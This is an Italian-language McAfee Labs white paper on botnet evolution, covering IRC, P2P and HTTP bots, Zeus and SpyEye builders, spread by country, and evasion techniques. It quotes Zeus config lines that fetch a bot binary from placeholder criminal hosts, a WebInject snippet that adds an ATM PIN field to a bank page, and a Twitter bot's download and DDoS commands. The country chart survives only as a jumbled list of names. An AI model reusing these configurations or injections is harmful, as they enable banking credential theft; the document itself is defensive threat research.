White paper La nuova era delle botnet Di Zheng Bu, Pedro Bueno, Rahul Kashyap e Adam Wosotowsky McAfee Labs™ White paper La nuova era delle botnet Indice dei contenuti Un settore in sviluppo 3 Evoluzione 4 Bot IRC 4 Bot localizzate 4 Bot P2P 4 Bot HTTP 5 Spy Eye 7 Diffusione globale 8 Suddivisione delle botnet: le principali minacce per nazione 9 Il ruolo dei governi 10 Chi è in pericolo? 11 Uno sguardo al futuro 11 Una nuova era di social zombie? 12 La massima clandestinità 13 Controffensiva: Global Threat Intelligence 14 Fonti 14 McAfee Labs™ 14 Informazioni su McAfee 14 White paper La nuova era delle botnet Le reti di robot, pubblicamente note come botnet, hanno una storia diversificata. In buona sostanza, con bot si indica semplicemente una serie di script o comandi o un programma creato per collegarsi a qualcosa (solitamente un server) ed eseguire un comando o una serie di comandi. Fondamentalmente esegue varie funzioni. Non è necessariamente malevola o dannosa. Le bot e i loro utilizzi si sono evoluti da semplici canali o osservatori di giochi (per esempio, le botnet Wisner’s Bartender e Lindahl’s Game Manager) a fornitori di servizi specializzati come la gestione dei database o la manutenzione di elenchi di accesso. Questo report prende in esame un utilizzo molto diverso: il "raggruppamento" di bot (denominate anche droni o zombie) da parte dei criminali informatici a supporto delle loro attività criminali. Poiché interessano le aziende, queste attività criminali possono includere il furto di segreti commerciali, l'inserimento di malware in file di codice sorgente, l'interruzione dell'accesso o di un servizio, il danneggiamento dell'integrità dei dati e il furto delle informazioni relative all'identità dei dipendenti. Le conseguenze per un'azienda possono essere disastrose e portare a perdita di fatturato e fiducia dei clienti, danneggiamento della reputazione, non raggiungimento della conformità con le normative fino alla chiusura dell'attività stessa. Per gli enti governativi, le preoccupazioni sono ancora più estese. Analizzeremo l'evoluzione delle bot criminali, l'industria che ne supporta la creazione e la distribuzione e come vengono oggi utilizzate da vari gruppi di criminali informatici. Suggeriremo inoltre quale riteniamo sarà il loro futuro nel breve periodo. Un settore in sviluppo Il settore delle botnet ha registrato una sorta di "curva di crescita" (sebbene non in senso positivo). Nei primi anni del secolo bot e botnet venivano create da programmatori con una buona conoscenza di networking e protocolli come Internet Relay Chat (IRC). L'utilizzo del protocollo IRC diede avvio al fenomeno del comando e controllo centralizzati, spesso noto anche come C&C. SDBot, una delle prime e più note bot, era codificato in linguaggio C++. (SDBot era molto diffuso perché il suo autore aveva pubblicato il codice sorgente, una pratica non comune.) Versioni più recenti di SDBot, note anche come SpyBot, iniziarono a sfruttare vulnerabilità Microsoft di chiamate di procedura remota; perciò i suoi programmatori avevano bisogno di competenze nella codifica di exploit per creare tali bot. In questo periodo bot e botnet fiorivano sfruttando varie vulnerabilità ampiamente disponibili nelle più comuni piattaforme Microsoft Windows. Le bot che emersero più tardi nel decennio passato presentavano ulteriori funzionalità per lanciare attacchi denial-of-service (DoS), scansione delle porte e keylogging, tra gli altri. Gli autori di questi malware richiedevano competenze nei linguaggi assemblatori nonché una solida formazione in ambito networking. RBot (2003) è stato tra i primi a utilizzare schemi/packer di compressione e cifratura come UPX, Morphine e ASPack. Tali richieste introdussero un nuovo livello di programmatori informatici specializzati che comprendessero schemi di cifratura, crittografia e come utilizzare tecniche evasive creando i loro codici binari. A questo punto, non si poteva guardare indietro. Il successo di RBot spianò la strada per una più ampia diffusione di crifratura e offuscamento in bot e botnet. Uno dei principali sviluppi nel controllo delle botnet è stato l'utilizzo delle reti peer-to-peer (P2P) per le comunicazioni da parte di Sinit (2003) e Phatbot (2004), che ha completamente modificato l'equazione delle comunicazioni delle botnet. Una delle botnet più sofisticate basate su P2P emersa in seguito è stata Storm Worm/Nuwar (2007), che utilizzava un'architettura P2P decentralizzata e si è dimostrata, per una volta, molto difficile da contrastare. L'esigenza di sofisticazione nella tecnologia delle botnet è guidata dalle varie soluzioni di sicurezza presenti sul mercato per combattere tali problemi. Inoltre, la sofisticazione stessa di bot e botnet spinge l'evoluzione delle tecnologie di sicurezza, creando una relazione molto complessa tra misure e contromisure tra gli autori di malware e i fornitori di soluzioni di sicurezza. Chiaramente, bot e botnet sono diventate sempre più complesse. I programmatori di questo malware devono possedere un livello avanzato di conoscenza di reti, sistemi e crittografia. Dati i volumi e il livello di complessità elevati delle botnet, è molto probabile che siano creati non da un piccolo gruppo di persone ma da un insieme di individui fortemente motivati dal ritorno economico delle loro imprese. La motivazione è ovvia: sabotare e compromettere le aziende e rubare dati che hanno un valore monetario. 3 White paper La nuova era delle botnet Evoluzione Bot IRC Le prime bot non erano sempre dannose. Ma oggi è molto meno comune, specialmente negli ultimi sei anni, a partire dall'esplosione delle botnet nel 2004 circa. Prima di allora, la maggior parte delle bot utilizzava IRC come protocollo per il controllo. Il protocollo IRC è stato utilizzato all'inizio per collegarsi alle chat room, che permettevano alle persone di scambiarsi messaggi, ed erano molto comuni 10-15 anni fa. Tuttavia, con l'avvento dei protocolli di messaggistica istantanea come ICQ, AIM e MSN Messenger, il protocollo IRC è diventato meno diffuso, ma viene ancora utilizzato da molti professionisti di networking e sicurezza della "vecchia scuola". Le prime bot venivano create per collegarsi a queste chat room (spesso denominate canali), assicurare che il canale rimanesse aperto, riconoscere gli operatori del canale e dare loro il controllo del canale stesso. L'impostazione più comune era quella di creare bot che potessero analizzare una rete e violare le macchine che contenevano nuove o vecchie vulnerabilità. Una volta compromessa una macchina, la bot si sarebbe collegata a una chat room (canale) specifica per ricevere istruzioni dal gestore della bot, come avviare un attacco DoS contro un sito web. Ancora oggi osserviamo tale comportamento nel recente attacco W32/Vulcanbot contro siti web di attivisti per i diritti umani. Altre funzioni IRC comuni sono quelle di prendere videate del sistema, scaricare o far crescere una bot, e così via. Alcune bot possono eseguire oltre 100 comandi. Abbiamo registrato un gran numero di nuove bot nel 2004, a causa del rilascio di varie applicazioni GUI che consentivano agli hacker di creare bot con un semplice clic. Tale facilità ha rappresentato un enorme passo avanti per i criminali informatici e gli autori di malware: oggi coloro che non sapevano come sviluppare programmi e avevano scarse conoscenze di protocolli di networking e sistemi operativi potrebbero creare un'ampia gamma di bot con un semplice clic del mouse. Bot localizzate Le bot funzionano quasi esclusivamente sulle varie versioni di Windows, ma sono emerse anche versioni localizzate. Utilizzando il linguaggio di script Perl, gli hacker hanno creato versioni che funzionano su vari tipi di sistemi operativi Unix e Linux. L'autore di tali versioni è il gruppo di hacker brasiliani AtrixTeam, al tempo solo un gruppo di giovani "smanettoni". Dato il loro formato "aperto", ancora oggi vediamo circolare queste versioni. Bot P2P Le botnet IRC della vecchia scuola sono ancora diffuse, ma hanno un punto debole: il server IRC. Una volta chiuso il server, l'hacker perde il controllo dell'esercito di bot. Nel 2007 è nato un nuovo tipo di botnet che utilizza il protocollo P2P. Si tratta dello stesso protocollo che molti programmi utilizzano per scaricare musica, per esempio. Una di queste botnet utilizzava un'implementazione cifrata basata sul protocollo eDonkey. Questo malware è diventato molto famoso: veniva originariamente denominato W32/Nuwar ma è poi salito alla ribalta con il nome di worm Storm. Storm incorporava circa 100 peer preimpostati come valori hash, che il malware decodifica e utilizza per controllare i nuovi file da scaricare. Tutte le transazioni sono cifrate, così solo il malware stesso può decodificare e agire in base alla risposta. Le risposte generalmente portano a URL che scaricano altro codice binario. Storm è stato responsabile della maggior parte dello spam durante gli anni 2007–2008 finché non è stato bloccato. Il vantaggio di un approccio P2P risiede nella sua struttura di controllo distribuita e flessibile, che la rende più difficile da bloccare rispetto ad una botnet di tipo IRC. Tuttavia, questa tipologia è più difficile da mantenere e diffondere data la sua complessità. Alla fine di aprile, abbiamo osservato un altro malware che condivideva parte dello stesso codice responsabile di spam e attacchi DoS - di Storm. 4 White paper La nuova era delle botnet Bot HTTP Due o tre anni fa, abbiamo assistito a un cambiamento nel controllo di molte botnet da canali IRC a siti web, utilizzando il protocollo HTTP. Questo passaggio a un protocollo comune si è rivelato una mossa intelligente da parte dei criminali informatici e degli autori di malware. L'evoluzione del protocollo HTTP ha avuto inizio con i progressi nei "kit di exploit". Tali kit, sviluppati principalmente da criminali informatici russi, includevano Mpack, ICEPack e Fiesta. Possono installare software su macchine remote e quindi controllarle da un sito web remoto. I criminali informatici inviano spam o un instant message con vari link alle vittime potenziali. Questi link conducono a siti web con installato il kit di exploit. Il kit quindi stabilisce quale exploit utilizzare in base alla nazione, alla versione del sistema operativo e del browser e anche alle versioni delle applicazioni client installate sulla macchina della vittima. Tutto ciò avviene in modo dinamico e a insaputa della vittima. Se l'exploit ha successo, può successivamente installare un insieme di malware per ottenere il controllo remoto della macchina infetta. Di tutte le botnet HTTP attuali un caso molto particolare è rappresentato da Zeus (nota anche come Zbot), specializzata nel furto di credenziali bancarie. Zeus include sia elementi client sia server. Il server include un builder che aiuta il gestore della bot a creare una variante per il client del malware PWS‑ZBot (il suo identificativo tecnico), che poi infetterà una macchina, portandola ad unirsi alla botnet collegandosi a un sito web remoto che ospita il server Zeus. Zeus segue un trend interessante: consentire a chiunque di creare in modo semplice una versione personalizzata del malware. Il toolkit di Zeus è piuttosto costoso da acquistare, ma il suo autore ha adottato una serie di misure per assicurarsi che lo strumento sia semplice da utilizzare, il che lo rende anche semplice da vendere ad altre persone, incrementando così anche i profitti del suo creatore. Il seguente esempio mostra Zeus Builder per la versione 1.2.x: Il pannello di sinistra mostra solo due opzioni: Information e Builder. Selezionando Information si scopre se la macchina è infettata con Zeus. Selezionando Builder, la persona che controlla il toolkit riceve aiuto per creare una nuova bot. Il kit utilizza due file di input: Config e WebInjects. Sebbene il Builder disponga di un tasto per modificare il file Config, il tasto è solo uno shortcut. Utilizziamo Notepad per modificare il file. Il file Config include i parametri che saranno seguiti dalla bot. 5 White paper La nuova era delle botnet Esempi di Config: … url_config "http://www.[indirizzo-IP-dei-criminali].cn/cp/config.bin" url_compip "http://www.[indirizzo-IP-dei-criminali].com/" 2048 encryption_key "12345654321" ;blacklist_languages 1049 end entry "DynamicConfig" url_loader "http://www.[altro-indirizzo-IP-di-criminale].cn/cp/bot.exe" … Questo estratto di Config indica alla bot dove dovrebbe andare per scaricare il file di configurazione e la bot stessa. Questi passaggi assicurano che gli hacker che gestiscono le bot possano aggiornare le loro bot e configurazioni con nuove funzioni e nuovi obiettivi in qualunque momento. Inoltre consentono ai responsabili delle bot di distribuire il file di configurazione e il codice binario delle bot a server diversi, creando così flessibilità con un'architettura distribuita. Il secondo file per creare la bot è WebInject. Questo file specifica gli obiettivi, le vittime da cui l'autore di malware o il proprietario del toolkit vuole ottenere informazioni. Zeus è in grado non solo di impossessarsi di informazioni dalla pagina del web originale, ma anche di inserire campi aggiuntivi. In questo modo può impossessarsi di un numero maggiore di informazioni se il proprietario del toolkit lo desidera. Un esempio di WebInject: … set_url https://www.[grande-banca-vittima].com/* G data_before <span class="mozcloak"><input type="password"*/></span> data_end data_inject <br><strong><label for="atmpin">ATM PIN</label>:</strong> <br /> <span class="mozcloak"><input type="password" accesskey="A" id="atmpin" name="USpass" size="13" maxlength="14" style="width:147px" tabindex="2" /></span> data_end data_after data_end … Questo codice sottrarrà le informazioni sull'URL, che in questo caso è una banca. Oltre a rubare nome utente e password, Zeus inserirà un altro campo per il numero PIN del Bancomat. 6 White paper La nuova era delle botnet Come tendono a fare i malware che hanno successo, Zeus ha generato varie versioni "piratate" del Builder. Alcuni includono addirittura i propri backdoor. Come è possibile? Una versione piratata è apparsa nella seguente videata: Questa versione, denominata MultiBuilder, ha creato due varianti sulla base di Zeus Version 1.3. Abbiamo di recente assistito al passaggio di Zeus dalla Versione 1.3 alla 2.0, che oggi include un modello di licenza molto rigoroso. Zeus è in realtà collegato alla macchina fisica dell'acquirente utilizzando una licenza software commerciale! Il canale di creazione e distribuzione di questo malware mostra un forte senso degli affari. Spy Eye Spy Eye è un altro esempio di bot HTTP complessa. Mostra varie similitudini con Zeus, principalmente che si tratta di un form grabber e che vanta un'architettura di controllo davvero impressionante. Come Zeus, Spy Eye dispone del proprio builder grafico: 7 White paper La nuova era delle botnet Una funzione interessante di Spy Eye è la sua capacità di rimuovere Zeus dalla macchina che infetta, creando un conflitto interessante all'interno del mondo degli autori di malware. Non è la prima volta che assistiamo ad una lotta tra autori di malware. Per evitare di essere analizzati dai loro obiettivi, sia Zeus che Spy Eye offrono l'opzione di utilizzare una chiave di cifratura durante il processo di creazione della bot. Nelle prime versioni di Zeus questa chiave era preimpostata e incorporata, il che offre alle forze di sicurezza un modo molto più rapido per analizzare ed individuare gli obiettivi del malware. Con questa nuova funzione, i malintenzionati hanno sicuramente innalzato il livello del gioco. Diffusione globale Distribuzione complessiva delle botnet per nazione India Brasile Russia Germania Stati Uniti Gran Bretagna Colombia Indonesia Italia Spagna Argentina Polonia Pakistan Portogallo Vietnam Corea del sud Grecia Cina Bielorussia Australia Altri Figura1: McAfee Labs ha rilevato più infezioni botnet - quasi 1,5 milioni - in India che in qualsiasi altra nazione. Anche Brasile, Russia e Germania hanno superato il milione di infezioni rilevate. 8 White paper La nuova era delle botnet Suddivisione delle botnet : le principali minacce per nazione Argentina Cina Gran Bretagna Asprox Australia Asprox Bielorussia Asprox Brasile Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Altro Altro Altro RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Asprox Colombia Asprox Bagle-CB Bagle-CB Bobax Bobax Cimbot Cimbot Cutwail Cutwail Cutwail2 Cutwail2 DarkMailer DarkMailer Dlena Dlena Donbot Donbot Festi Festi Gheg Altro RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Corea del sud Asprox Germania Asprox Bagle-CB Bagle-CB Bobax Bobax Cimbot Cimbot Cutwail Cutwail Cutwail2 Cutwail2 DarkMailer DarkMailer Dlena Dlena Donbot Donbot Festi Festi Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Altro Altro Altro Altro RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Xarvester Asprox Grecia Asprox India Asprox Indonesia Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Festi Festi Festi Gheg Gheg Gheg Grum Grum Grum Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Maazben Maazben Maazben Mega-D Mega-D Mega-D Netsky Netsky Netsky Altro Altro Altro RK1 RK1 RK1 RK2 RK2 RK2 Reposin Reposin Reposin Rustock Rustock Rustock Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Altro RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester 9 White paper Italia Asprox Pakistan Asprox Polonia Asprox Portogallo Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Mega-D Mega-D Mega-D Netsky Netsky Netsky Altro Altro RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Altro RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester Russia La nuova era delle botnet Asprox Spagna Asprox Bagle-CB Bagle-CB Bobax Bobax Cimbot Cimbot Cutwail Cutwail Cutwail2 Cutwail2 DarkMailer DarkMailer Dlena Dlena Donbot Donbot Festi Festi Gheg Gheg Grum Grum Grum2 Grum2 HelloGirl HelloGirl Lethic Lethic Maazben Maazben Mega-D Mega-D Netsky Netsky Altro Altro RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Stati Uniti Asprox Maazben Mega-D Netsky Altro RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester Vietnam Asprox Bagle-CB Bagle-CB Bobax Bobax Cimbot Cimbot Cutwail Cutwail Cutwail2 Cutwail2 DarkMailer DarkMailer Dlena Dlena Donbot Donbot Festi Festi Gheg Gheg Grum Grum Grum2 Grum2 HelloGirl HelloGirl Lethic Lethic Maazben Maazben Mega-D Mega-D Netsky Netsky Altro Altro RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Figura 2: Le principali botnet, per nazione. Rustock è di gran lunga la botnet più diffusa al mondo. Il ruolo dei governi Poiché la minaccia di una guerra informatica e dei danni che potrebbe causare aumenta, probabilmente vedremo le botnet utilizzate come armi in conflitti futuri. Anzi, potrebbero essere già state utilizzate. Nel nostro mondo sempre più tecnologico l'importanza di comunicazioni efficaci nella gestione di qualsiasi crisi è fondamentale. L'organizzazione di risorse e il loro utilizzo per contrastare eventi naturali o artificiali dipende in larga misura da Internet, uno strumento essenziale per divulgare informazioni ad una serie di parti interessate e coordinare le loro risposte. Influire negativamente o interrompere tale flusso informativo potrebbero addirittura peggiorare un evento. Internet potrebbe diventare un altro teatro di guerra. Eventi come la recente marea nera nel Golfo del Messico, i bombardamenti in Europa e in Iraq, o le schermaglie navali tra i coreani possono essere colpiti da interruzioni mirate di nuovi punti o gruppi di risposta d'emergenza, che dipendono da Internet. Le botnet possono essere acquistate o affittate al mercato nero, e i loro proprietari possono forzatamente assumerne il controllo e reindirizzarle per nuovi obiettivi. Sappiamo che ciò accade regolarmente, perciò sarebbe da sciocchi non aspettarsi che organizzazioni governative o stati nazione in tutto il mondo siano coinvolti nell'acquisizione di funzionalità botnet per esigenze offensive e controffensive. Un'entità civica o nazionale ha dei buoni motivi per acquisire una botnet dai suoi attuali proprietari. Le botnet si infiltrano in aziende, singoli e uffici governativi oltre che in workstation militari. È una questione della massima importanza che i diritti intellettuali e di privacy di cittadini e istituzioni in tutto il mondo siano protetti da coloro che li utilizzerebbero illegalmente. Per assumere il controllo di una botnet il nuovo responsabile sarà costretto a scegliere una strategia: chiudere il sistema, il che potrebbe 10 White paper La nuova era delle botnet potenzialmente danneggiare le macchine che sono parte della botnet, causare seri danni all'infrastruttura ed eventualmente rendere il nuovo proprietario responsabile per il danno; disattivare la botnet finché tutti i nodi infetti vengono modernizzati e non sono più sotto controllo; oppure monitorare la botnet per identificare e catturare il gestore della bot. Ciascuno di questi passaggi è controverso. Chi è in pericolo? Tutti gli utenti di computer sono in pericolo perché tutti navighiamo sulla stessa rete Internet. Ci sono solo una manciata di modi con cui i criminali informatici possono infettare un sistema o una rete con le loro bot (o qualsiasi forma di software dannoso). Questi modi prevedono una qualche forma di social engineering, che può essere definita come una violazione del cervello umano. Gli aggressori utilizzano uno strategemma o un'esca per ingannare gli utenti di computer e spingerli o a fare clic su un link o a installare un programma che non utilizzerebbero altrimenti. Una delle tecniche più intelligenti e diffuse oggi per i criminali informatici è quella di utilizzare eventi di cronaca di alto profilo per attirare vittime inconsapevoli. I criminali informatici leggono le stesse notizie di cronaca e sanno che molte persone consultano le notizie online. Che si tratti di un link che finge di essere un video di un disastro attuale o un dramma che interessa celebrità famose, tali stratagemmi attirano utenti come il miele con gli orsi. Tali aggressori potrebbero insegnare qualche trucco ai responsabili marketing con la loro conoscenza del comportamento umano e che cosa gli utenti ricercano online. Dobbiamo rimanere consapevoli dei rischi che corriamo navigando e utilizzando le tecnologie Web 2.0 dal momento che i criminali informatici utilizzeranno le notizie per colpirci. Ciascuno di noi dovrebbe essere sospettoso nei confronti degli attacchi di social networking, ma aziende e governi subiscono i maggiori danni dagli attacchi di botnet. Alcune delle minacce per le aziende includono: • Click fraud: visitando pagine web e tramite clic automatico su banner pubblicitari per sottrarre grandi somme di denaro da società pubblicitarie online • Attacchi DoS distribuiti: saturazione della larghezza di banda per bloccare il traffico legittimo. Questi attacchi sono più spesso condotti da aziende concorrenti, clienti insoddisfatti o per motivi politici. • Infiltrazione in file system: accesso a sistemi critici per rubare dati dei clienti, informazioni sulla privacy dei dipendenti, segreti commerciali, informazioni finanziarie aziendali, ecc. • Disabilitazione della sicurezza esistente: prevenzione delle attività di bonifica o dirottamento da parte di proprietari di bot rivali • Spam: utilizzo di risorse e larghezza di banda di altri sistemi per inviare grandi quantità di spam • Infezioni del codice sorgente: avvelenamento dell'intero albero del codice sorgente inserendo modifiche non autorizzate e impercettibili o individuazione di ulteriori vulnerabilità da sfruttare Le conseguenze di tali attacchi possono essere piuttosto gravi, con costi significativi per le aziende in termini di manodopera e tempo per le attività di bonifica. Inoltre, le aziende potrebbero vedere annullati i loro mandati di conformità con le normative o di settore. Sono inoltre probabili responsabilità legali da parte di clienti, dipendenti o altri che abbiano subito danni per colpa di misure di sicurezza inadeguate da parte dell'azienda. Per i governi e i proprietari di infrastrutture critiche, i danni causati dalle botnet possono essere anche più estesi: • Gli attacchi DoS possono interrompere le comunicazioni durante una crisi. Le infezioni al codice sorgente possono provocare la chiusura di reti critiche. • I sistemi ad accesso ristretto possono fornire al nemico informazioni militari. • Uno sguardo al futuro Negli ultimi sei anni, le botnet sono diventate una delle maggiori minacce non solo per i professionisti della sicurezza informatica ma anche per le aziende e i consumatori, praticamente chiunque possegga un computer. Le botnet rappresentano l'infrastruttura più essenziale utilizzata da criminali informatici e governi per lanciare praticamente ogni tipo di attacco: dallo spionaggio e fuoriuscita di dati allo spam agli attacchi DDoS. McAfee Labs ha già osservato un trend importante verso un'infrastruttura di botnet più distribuita e flessibile, che si basa su tecnologie solide come il protocollo P2P, il controllo via web e i servizi Web 2.0, oltre che su tecniche di evasione e fail-over. 11 White paper La nuova era delle botnet Una nuova era di social zombie? Di pari passo con l'evoluzione dei servizi Web 2.0 aumentano anche le attività degli autori di botnet, man mano che adottano nuove tecnologie per incrementare la complessità dei loro attacchi. KeriosC2, mentre scriviamo questo report, è uno strumento proof-of-concept che dimostra che LinkedIn, Twitter e TinyURL possono essere utilizzati per controllare una botnet. Gli utenti di computer in tutto il mondo si divertono con il social networking; ora lo fanno anche le botnet. E non si tratta di uno sviluppo positivo. Dal momento che le botnet sfruttano applicazioni e protocolli utilizzati comunemente, sarà più difficile che mai rilevare e prevenire le comunicazioni delle botnet. Un ulteriore sviluppo si è verificato a maggio, quando alcune bot hanno iniziato ad utilizzare Twitter per ricevere i comandi. La funzionalità è al momento piuttosto semplice; si limita a monitorare (o seguire) un account Twitter per ricevere i comandi. Come si evince dalla videata seguente, ha un builder GUI molto semplice. A differenza dei più complessi Zeus o Spy Eye, questa forma non include alcuna opzione, semplicemente un campo in cui inserire il nome utente di Twitter, che la bot seguirà per ricevere i comandi. Mentre scriviamo, anche la struttura e la sintassi del comando sono elementari: .VISIT: per aprire una pagina specifica .DOWNLOAD: per scaricare un file da un'ubicazione remota .DDOS: per causare un attacco denial of service alla vittima 12 White paper La nuova era delle botnet La massima clandestinità Gli autori di botnet hanno adottato molti approcci per evitare il rilevamento da parte di software o dispositivi di sicurezza. In termini di processo, gli autori di malware testano comunemente il loro malware con i prodotti dei principali vendor di sicurezza per assicurarsi che non vengano individuati, o quasi. Di conseguenza, criminali informatici e autori di malware spesso pubblicizzano il loro malware come "a prova di rilevamento". Elenchi di controllo degli accessi o l'applicazione di policy basate su IP possono rappresentare un controllo efficace contro le connessioni da parte di una bot verso i suoi server di controllo. Autori di botnet e malware hanno risposto a tale contrattacco implementando algoritmi di flusso invece che utilizzare elenchi IP incorporati per i loro server di comando. Zeus utilizza questa tecnica per generare domini rapidamente. Questo passaggio può sconfiggere in modo efficace i molti meccanismi di rilevamento basati sulle tradizionali blacklist. I malintenzionati hanno sviluppato molte tecniche di evasione per i download drive-by per evitare l'ispezione da parte di dispositivi di sicurezza di rete. Un buon esempio è la manipolazione dell'estensione dei file dimostrata dal builder Gh0st RAT. (Consultare la videata seguente.) Operazione Aurora e altre nuove minacce malware hanno utilizzato trucchi simili. Osserviamo molti altri tipi di evasioni - dalla semplice codifica alla cifratura (anche effettuando lo xoring del codice binario) - nel tentativo da parte degli autori di malware di installare il loro software sulla macchina di una vittima. Nel corso degli ultimi anni molte botnet di grandi dimensioni sono state messe offline. Per evitare che ciò accada e rendere la loro infrastruttura di botnet più solida e flessibile, i responsabili delle bot hanno iniziato ad introdurre nuove tecniche. Abbiamo già osservato le tecniche di flusso per incrementare la flessibilità dei server di controllo. Il protocollo P2P, sebbene costoso da implementare e supportare, è stato utilizzato anche in alcune botnet furtive come Storm e Nugache. I protocolli web, sia cifrati che in chiaro, vengono ampiamente utilizzati in sostituzione dei comandi per il protocollo IRC utilizzato più comunemente, principalmente perché queste porte web sono quasi universalmente abilitate attraverso i firewall, anche in reti aziendali rigorosamente controllate. McAfee Labs prevede che criminali informatici e autori di botnet continueranno a spingersi ai limiti delle tecnologie Web 2.0. Di seguito alcuni altri avanzamenti previsti: Funzionalità ed accesso multibrowser ben oltre Internet Explorer e Firefox Maggiore integrazione incorporata con tecnologie di instant-messaging come JabberZeuS per fornire un rapido accesso ai dati bancari e non solo • Ulteriore integrazione con altro malware, come Bredolad e Pushdo, per assicurare una maggior diffusione sui sistemi a livelo globale • • 13 White paper La nuova era delle botnet Controffensiva: Global Threat Intelligence Poiché le minacce informatiche sono cresciute in modo esponenziale diventando anche sempre più complesse, i professionisti della sicurezza richiedono un approccio diverso per rilevare e contrastare gli attacchi. In passato, una strategia di difesa approfondita - una stratificazione di tecnologie simili era sufficiente. L'approccio odierno, tuttavia, deve sfruttare le informazioni correlate sulle minacce provenienti da tutto il mondo e per tutti i vettori delle minacce. Tali informazioni di intelligence devono essere poi incorporate in un'ampia gamma di prodotti di sicurezza per consentirgli di applicare policy locali sulla base della più recente attività delle minacce e per condividere informazioni in modo che l'infrastruttura di sicurezza complessiva operi in modo armonico. McAfee sta scrivendo il capitolo successivo per quanto riguarda la sicurezza approfondita con Global Threat Intelligence, il nostro motore nel cloud che raccoglie e correla i dati sulle minacce provenienti da tutti i vettori delle minacce, crea un modello di minaccia completo e offre protezione al mercato tramite una suite completa di prodotti di sicurezza. La nostra funzionalità cloud opera di concerto con i motori locali dei prodotti McAfee e i meccanismi di enforcement basati sulle policy per fornire la protezione contro le minacce più solida e completa disponibile sul mercato. I nostri clienti beneficiano dall'utilizzo di prodotti di sicurezza McAfee che non solo condividono le informazioni di intelligence, ma lo fanno in modo significativo e contestuale al loro ruolo e a dove risiedono sulla rete. Fonti • "Progress Made, Trends Observed" (I progressi fatti, i trend rilevati), Microsoft Antimalware Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/msrt%20 -%20progress%20made%20lessons%20learned.pdf • SecureWorks. http://www.secureworks.com/ • White paper tecnici McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html McAfee Labs™ McAfee Labs è il gruppo di ricerca mondiale di McAfee, Inc. Con l'unica organizzazione di ricerca focalizzata su tutti i vettori di minaccia, ovvero malware, web, e-mail, rete e vulnerabilità, McAfee Labs è in grado di sfruttare l'intelligence di milioni di sensori e tecnologie di reputazione "in the cloud", quali McAfee Artemis™ e McAfee TrustedSource™. I 350 ricercatori pluridisciplinari di McAfee Labs in 30 nazioni seguono la gamma completa di minacce in tempo reale, identificando le vulnerabilità delle applicazioni, analizzando e correlando i rischi e attivando rimedi immediati per proteggere aziende e consumatori. Informazioni su McAfee Con sede principale a Santa Clara, California, McAfee Inc. è la principale azienda focalizzata sulle tecnologie di sicurezza. McAfee è costantemente impegnata ad affrontare le più difficili sfide legate alla sicurezza. L'azienda offre prodotti e servizi di sicurezza riconosciuti e proattivi che proteggono sistemi e reti in tutto il mondo, consentendo agli utenti di collegarsi a Internet, navigare ed effettuare acquisti sul web in modo sicuro. Supportata da un pluripremiato team di ricerca, McAfee crea prodotti innovativi destinati a utenti consumer, aziende, pubblica amministrazione e service provider che necessitano di conformarsi alle normative, proteggere i dati, prevenire le interruzioni dell'attività, individuare le vulnerabilità e monitorare e migliorare costantemente la propria sicurezza. http://www.mcafee.com/it. Le informazioni contenute nel presente documento sono fornite solo a scopo istruttivo e a vantaggio dei clienti di McAfee. Le informazioni contenute nel presente documento sono soggette a modifica senza preavviso e vengono fornite "così come sono" senza alcuna garanzia relativamente alla loro precisione o applicabilità a qualunque situazione o circostanza specifica. McAfee Srl via Fantoli, 7 20138 Milano Italia (+39) 02 554171 www.mcafee.com/it McAfee e il logo McAfee sono marchi registrati 